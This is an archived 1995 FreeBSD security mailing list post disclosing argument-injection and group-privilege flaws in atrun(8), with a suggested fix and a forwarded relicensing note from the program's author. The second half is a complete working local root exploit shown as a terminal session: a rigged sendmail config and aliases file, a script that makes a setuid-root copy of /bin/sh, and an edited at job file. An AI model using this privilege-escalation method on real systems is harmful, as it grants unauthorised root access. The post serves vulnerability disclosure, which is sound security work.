Skip site navigation (1)Skip section navigation (2)
Date:      Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300)
From:      adam <adam@math.tau.ac.il>
To:        freebsd-security@FreeBSD.org
Subject:   atrun hole
Message-ID:  <199504041320.QAA09588@lune.math.tau.ac.il>

next in thread | raw e-mail | index | archive | help

There are some security problems in the FreeBSD atrun(8) system,
one of which allows root access to be obtained easily.

First, before running a job, atrun takes an 8 character string
from the at job file, assumes it is the login of someone to mail,
and passess it to sendmail without any checks.  The code says
that atrun is run setuid root, and therefore it tries to remain
secure by using a scheme which revokes privileges based on changing
the real and effective uids of the process.  Note, *uids*.
However, since (both according to the man page, and the way FreeBSD
comes set up) atrun is not setuid root, but executed from /etc/crontab -- 
it is really run by the root uid.  This means that no matter what 
atrun does, it executes sendmail as root, and there's the hole, 
which allows root to be broken.  An exploit for this problem is 
included below.

The second problem is that atrun only calls setgid() and setuid()
to reduce privileges, and doesn't call initgroups().  This leaves 
jobs run by atrun being in every group root is in.  

The author of the program, Thomas Koenig <ig25@rz.uni-karlsruhe.de>,
has released a better version of the system, at-2.7a, for Linux.
It fixes all of these problems.  Therefore, as an immediate fix,
I suggest obtaining and installing that version, though I'm unsure
of how smoothly it will go, considering it's a Linux program.

    ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz

He writes --

``If it's ok by the FreeBSD people, I'll put out version 2.8 (which
checks for the presence of a '-' in the name to be mailed to,
and then doesn't invoke the mailer) up with a BSD copyright again,
but that'll take a bit of time.''

And, later --

Subject: Re: atrun hole
To: adam@math.tau.ac.il (adam)
Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST)
In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm
From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 324

An additional thought...

If there's any problem because of the GPL copyright on at 2.7a, I, with
this mail, give the *BSD maintainers permission to put it under the same
BSD-style license which I've slapped on 2.5 or whatever old version it
was I sent them.

Please feel free to forward this as appropriate.

Thomas Koenig

===

The following works provided the at jobs directory (/var/at/jobs)
is accessible to users.  It is with FreeBSD.  It is set to mode
0700 with at-2.7a.

5:53pm  [eden:~] % whoami
adam
5:53pm  [eden:~] % cd /tmp
5:53pm  [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' 
 -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c
5:54pm  [eden:/tmp] % cat > aliases
postmaster: "|/tmp/rootme"
root: "|/tmp/rootme"
adam: "|/tmp/rootme"
^D
5:55pm  [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp
/tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total
5:55pm  [eden:/tmp] % cat > rootme
#!/bin/sh
/bin/cp /bin/sh /tmp/sh
/bin/chmod 6777 /tmp/sh
^D
5:55pm  [eden:/tmp] % chmod 755 rootme
5:56pm  [eden:/tmp] % at now + 1 min
fooz
^D
Job a00ca9a79.000 will be executed using /bin/sh
5:56pm  [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000
5:56pm  [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000
#! /bin/sh
# mail     -C/tmp/c 1
umask 22
HOME=\/home\/adam; export HOME
SHELL=\/usr\/local\/bin\/tcsh; export SHELL
LOGNAME=adam; export LOGNAME
USER=adam; export USER
PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH
HOSTTYPE=FreeBSD; export HOSTTYPE
VENDOR=intel; export VENDOR
OSTYPE=FreeBSD; export OSTYPE
MACHTYPE=i386; export MACHTYPE
SHLVL=1; export SHLVL
PWD=\/tmp; export PWD
HOST=eden; export HOST
PAGER=less; export PAGER
VISUAL=joe; export VISUAL
MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH
cd /tmp
fooz
5:56pm  [eden:/tmp] % sleep 240
DING!  [eden:/tmp] % /tmp/sh
# whoami
root



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199504041320.QAA09588>